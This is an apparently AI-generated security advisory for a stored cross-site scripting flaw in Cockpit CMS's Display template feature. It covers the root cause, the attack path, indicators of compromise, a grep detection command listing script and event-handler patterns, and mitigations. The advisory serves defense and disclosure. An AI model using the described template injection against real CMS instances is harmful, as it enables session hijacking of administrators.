CVE-2026-23695 Overview
CVE-2026-23695 is a stored cross-site scripting (XSS) vulnerability in Cockpit CMS through version 2.14.0. The flaw resides in the Set field type's Display template option, where the template string is processed by the $interpolate function using new Function() and rendered via Vue's v-html directive without sanitization. An attacker holding the content/:models/manage permission can inject arbitrary JavaScript into the Display template. The payload executes in the browser of any user viewing the collection items list. The issue is tracked under [CWE-79] and was patched in commit 72a83fc.
Critical Impact
Authenticated users with content model management permissions can inject persistent JavaScript that executes against any administrator browsing the affected collection.
Affected Products
- Cockpit CMS versions through 2.14.0
- Cockpit CMS Set field type Display template option
- Cockpit CMS instances exposing the content/:models/manage permission to non-administrators
Discovery Timeline
- 2026-05-15 - CVE-2026-23695 published to NVD
- 2026-05-18 - Last updated in NVD database
Technical Details for CVE-2026-23695
Vulnerability Analysis
The vulnerability stems from unsafe template evaluation in the Cockpit CMS admin interface. The App.utils.$interpolate helper compiles the user-supplied Display template string into executable JavaScript using new Function(). The resulting markup is then rendered through Vue's v-html directive, which bypasses standard HTML escaping. Because the Display template is stored as part of the field definition, the injected payload persists in the database and re-executes for every user that loads the collection items list. The attack falls under [CWE-79], stored cross-site scripting.
Root Cause
The root cause is the combination of two unsafe primitives. First, $interpolate evaluates template strings through the Function constructor, providing a JavaScript execution sink. Second, the output is bound with v-html, removing Vue's built-in output encoding. No sanitization or allow-listing is applied to the template input, so any script content supplied by a user with model-management rights is preserved and rendered.
Attack Vector
An authenticated attacker with content/:models/manage permission edits a Set field and supplies a malicious Display template containing JavaScript. When another user, typically an administrator, navigates to the collection items list, the template is interpolated and inserted into the DOM via v-html. The attacker's script then executes in the victim's session, enabling session token theft, CSRF-style admin actions, or pivoting to higher-privileged accounts.
// Security patch from commit 72a83fc - modules/App/assets/js/app/utils.js
// Replaces App.utils.$interpolate / App.utils.interpolate Function-based eval
+import { Engine as JSLiteEngine } from "../../vendor/jslite.esm.js";
+
let formatSize = function(bytes) {
if (bytes == 0) { return "0.00 B"; }
let e = Math.floor(Math.log(bytes) / Math.log(1024));
// Source: https://github.com/Cockpit-HQ/Cockpit/commit/72a83fcfe85ad8330e9ae834bc02fa517b5749e9
The fix replaces the Function-based evaluator with the JSLiteEngine sandboxed expression engine, removing the arbitrary code execution sink.
Detection Methods for CVE-2026-23695
Indicators of Compromise
- Set field definitions containing <script>, onerror=, onload=, or other event handler attributes inside the Display template value.
- Unexpected modifications to content model JSON definitions in the Cockpit storage backend.
- Admin-session web requests originating immediately after an admin loads a collection items list.
Detection Strategies
- Audit stored content model definitions for Display template strings that contain JavaScript syntax such as ${, Function(, or HTML tags.
- Enable Content Security Policy (CSP) reporting and review violations triggered by inline script execution in the Cockpit admin UI.
- Review Cockpit access logs for accounts with content/:models/manage permission that recently modified Set field configurations.
Monitoring Recommendations
- Monitor changes to the collections and models storage for non-administrator users editing field templates.
- Alert on outbound requests from admin browser sessions to unexpected destinations following access to /admin/content/collection/entries.
- Track privilege grants of content/:models/manage and review whether the role is required for each assigned user.
How to Mitigate CVE-2026-23695
Immediate Actions Required
- Upgrade Cockpit CMS to the version containing commit 72a83fc or later.
- Audit existing Set field Display templates and remove any entries containing scripts or HTML event handlers.
- Restrict content/:models/manage permission to fully trusted administrators only.
Patch Information
The vendor fix is published in Cockpit-HQ commit 72a83fc, which replaces the Function-based $interpolate evaluator with the sandboxed JSLiteEngine. Additional context is available in the VulnCheck Security Advisory.
Workarounds
- Revoke content/:models/manage permission from non-administrator roles until patched builds are deployed.
- Apply a strict Content Security Policy that blocks inline script execution in the Cockpit admin UI.
- Manually sanitize stored Display template values to remove HTML and JavaScript constructs.
# Search existing Cockpit storage for suspicious Display templates
grep -rEi '"display"\s*:\s*".*(<script|onerror=|onload=|javascript:).*"' \
/path/to/cockpit/storage/data/collections/ \
/path/to/cockpit/storage/data/models/
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
